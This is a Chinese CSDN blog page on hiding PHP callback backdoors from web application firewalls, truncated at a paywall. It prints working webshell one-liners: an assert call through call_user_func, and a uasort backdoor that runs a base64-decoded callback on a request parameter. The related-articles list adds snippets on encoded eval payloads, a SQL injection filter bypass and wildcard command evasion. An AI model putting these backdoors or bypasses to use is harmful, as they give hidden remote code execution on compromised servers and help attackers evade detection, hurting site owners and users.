bypass各种waf--php回调后门

最新推荐文章于 2024-05-28 10:57:22 发布
最新推荐文章于 2024-05-28 10:57:22 发布
阅读量324 收藏
点赞数
分类专栏: Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43710889/article/details/119654742
版权
本文探讨了如何使用PHP回调后门来绕过Web应用防火墙(WAF)。介绍了双参数回调后门,如uasort、array_reduce和array_udiff的用法,并强调了单参数后门在不同PHP版本中的稳定性。还分享了几种不易被检测到的回调后门技巧,以实现隐蔽的代码执行。
摘要由CSDN通过智能技术生成

文章目录

bypass各种waf–php回调后门

一般过狗思路

call_user_func('assert', $_REQUEST['pass'])

在这里插入图片描述

双参数回调后门

uasort

<?php
$e=$_REQUEST['e'];
$arr=array('test', $_REQUEST['pass']);
uasort($arr, base64_decode($e));

在这里插入图片描述
由此方法引申出的姿势有:

<?php
$e=$_REQUEST['e'];
$arr=array('test'=>1
最低0.47元/天 解锁文章
南岸青栀*
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
WAF的正确bypass
10-20
主要介绍了WAF的正确bypass的相关资料,需要的朋友可以参考下
PHP通过bypass disable functions执行系统命令的方法汇总
10-18
主要介绍了PHP通过bypass disable functions执行系统命令的方法汇总,需要的朋友可以参考下
waf bypass
weixin_34319111的博客
08-07 124
1.前言去年到现在就一直有人希望我出一篇关于waf绕过的文章,我觉得这种老生常谈的话题也没什么可写的。很多人一遇到waf就发懵,不知如何是好,能搜到的各种姿势也是然并卵。但是积累姿势的过程也是迭代的,那么就有了此文,用来总结一些学习和培养突破waf的思想。可能总结的并不全,但目的并不是讲那些网上搜来一大把的东西,So…并不会告诉大家现有的姿势,而是突破Waf Bypass思维定势达到独立去挖掘wa...
利用PHP的字符串解析特性Bypass
最新发布
2401_84466359的博客
05-28 1186
上述PHP语句的参数%20news[id%00的值将存储到$_GET["news_id"]中。HP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:1.删除空白符2.将某些字符转换为下划线(包括空格)parse_str函数通常被自动应用于get、post请求和cookie中。如果你的Web服务器接受带有特殊字符的参数名,那么也会发生类似的情况。如上代码所示,我进行了多次循环,枚举了参数名三个位置的0到255之间的所有字符,看看解析函数到底是如何处理这些特殊字符的。
PHP webshell bypass
qq_37561898的博客
12-29 550
php webshell bypass
php大马免杀技巧 | bypass waf
weixin_30598225的博客
07-27 454
Part 1 前言    Part 2 免杀   执行代码 eval 或 preg_replace的/e修饰符来执行大马代码。     $a = 'phpinfo();'; eval($a); //eval执行php代码   编码 如果直接去执行代码,是过不了waf的,我们一般需要将大马源码进行编码。 eval_gzinflat...
PHP利用某些函数bypass waf探讨
goddemon
07-22 386
前几天写了一篇文章,由黑到白这篇文章中用到echo的一个特性去一步一步写马看师傅们的评论然后去研究了下原因学到了很多比如linux写shell少了_POST空格以及$这些字符都写不进去也恰好看到了微信公众号里面有个师傅写了篇文章链接如下https里面提到了一个tips利用get_headers绕过了waf顿时引来了自己的兴趣,因为目前的很多waf是基于post包和get包来拦截的如果我把参数内容可控到header头里面不就能稳稳的过了嘛。............
Bypass WAF实战总结
qax
01-09 2741
0X00前言 上个月刷了一波洞,然后这个月初远程支持了一个HW,在文件上传getshell的时候,碰到个各式各样的云waf,通过一个月的实战,总结了几个比较实用的技巧,文章总结的不全,只是基于我实战中用到的一些方法。 0x01垃圾填充 这是众所周知、而又难以解决的问题。如果HTTP请求POST 太大,检测所有的内容,WAF集群消耗太大的CPU、内存资源。因此许多WAF只检测前面的几K字节、1M、或2M。对于攻击者而然,只需要在前面添加许多无用数据,把攻击payload放在最后即可绕过WAF检测。 1
php超小免杀大马_php大马免杀技巧 | bypass waf
weixin_39885166的博客
12-20 350
Part 1 前言Part 2 免杀执行代码eval 或 preg_replace的/e修饰符来执行大马代码。$a = 'phpinfo();';eval($a);//eval执行php代码编码如果直接去执行代码,是过不了waf的,我们一般需要将大马源码进行编码。eval_gzinflate_base64类型加密与解密:http://www.zhuisu.net/tool/phpencode.ph...
Bypass WAF
weixin_30745641的博客
03-19 158
一、绕过命令执行: 很多WAF会限制参数字符不能为可以执行的命令,诸如ls、nc等,如果直接使用这些字符会直接被WAF拦截,但是可以通过这种的方式绕过这一限制 1、? 符号:这个符号表示条件测试,比如执行/?in/?ls,会对路径中第一个匹配到的/*in/ls进行执行,通常情况下,目录中没有这些文件,所以可以直接定位到/bin/ls,因为根目录下满足*in的目录只有bin目录 *注:可...
php bypass shell,PHP-WebShell-Bypass-WAF
weixin_29531989的博客
04-10 188
PHP-WebShell-Bypass-WAFPHP WebShell 一句话的结构是:输入和执行,这是经典的PHP 一句话代码:WebShell 的输入点在$_GET和$_POST,执行点在eval(),经典的一句话WAF 都会拦截测试:测试:测试:综合上面三点,可以发现WAF 是通过关键字来拦截的,把这三个测试用例放到安全狗下测试可以发现,安全狗是通过综合判断来识别WebShell 的,...
bypasswaf
goddemon
02-24 1051
sql注入常见过滤以及绕过方法 常见绕过方法 step1: 过滤关键词:and, or, union 可能正则: preg_match(’/(and|or|union)/i’, $id) - Blocked: union select user, password from users - Bypass: 1 || (select user from users where user_id = 1) = 'admin' step2: 过滤关键词: and, or, union, where - Block
WAF-bypass:一款功能强大的Web应用防火墙安全测试工具
xnxqwzy的博客
08-05 463
WAF-bypass是一款功能强大的Web应用防火墙安全测试工具,该工具基于Python开发,并且完全开源。在该工具的帮助下,广大研究人员可以使用预定义和可定制的Payload来分析任何Web应用防火墙的安全性,并在资产被攻击之前提升系统防火墙的安全性能。
wafbypass总结
m0_66300626的博客
12-28 274
waf技巧心得:这几天一直在找有waf的网站,也成功绕过了一下waf,但可惜都没存在漏洞。我有一点强迫症,总喜欢把乱的东西通过思维导图展现出来,这可能对某些人来说看得不习惯,但这就是我这个人的尿性(不喜勿喷):如id=1/*几万个字符*/and 1=1,通过burpsuit抓包填充字符到/**/中,超过一定长度waf可能就不检测后面的数据了。:如id=1 order by 1&id=1 and 1=1,waf可能智检测&前面的而忽略了后面的。某些点没列出原因我对那几方面理解不够透彻,就不总结了。
32.我的wafBypass之道
weixin_30265103的博客
10-19 324
0x01 搞起 当我们遇到一个waf时,要确定是什么类型的?先来看看主流的这些waf,狗、盾、神、 锁、宝、卫士等等。。。(在测试时不要只在官网测试,因为存在版本差异导致规则库并不一致) 1.云waf: 在配置云waf时(通常是CDN包含的waf),DNS需要解析到CDN的ip上去,在请求uri时,数据包就 会先经过云waf进行检测,如果通过再将数据包流给主机。 2.主机防护软件:...
as_bypass_php_disable_functions-master
09-17
as_bypass_php_disable_functions-master是一个可以绕过PHP禁用函数的项目。 在PHP中,禁用函数是一种安全措施,用于限制脚本执行时可以调用的函数。这样可以防止恶意代码的执行,提高服务器的安全性。 然而,有时候我们可能需要在某些情况下调用被禁用的函数,例如一些特殊的需求或者调试目的。这时候,as_bypass_php_disable_functions-master就能帮助我们绕过这些禁用函数的限制。 该项目通过利用PHP的一些特性和漏洞,向PHP进程添加自定义扩展或修改PHP源代码的方式,以实现绕过禁用函数的效果。 使用这个项目需要一定的PHP编程知识和经验。首先,我们需要将项目中的代码部署到服务器上。然后,根据自己的需求,参考项目文档中的说明进行配置。 在项目运行后,我们就可以使用被禁用的函数了。但是需要注意的是,使用这个项目绕过禁用函数可能会带来一些风险和安全隐患。因此,我们应该谨慎使用,并确保代码的安全性。 总之,as_bypass_php_disable_functions-master是一个用于绕过PHP禁用函数的项目,可以帮助我们在特殊情况下调用被禁用的函数。但是使用时需要注意安全性和潜在的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

南岸青栀*

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值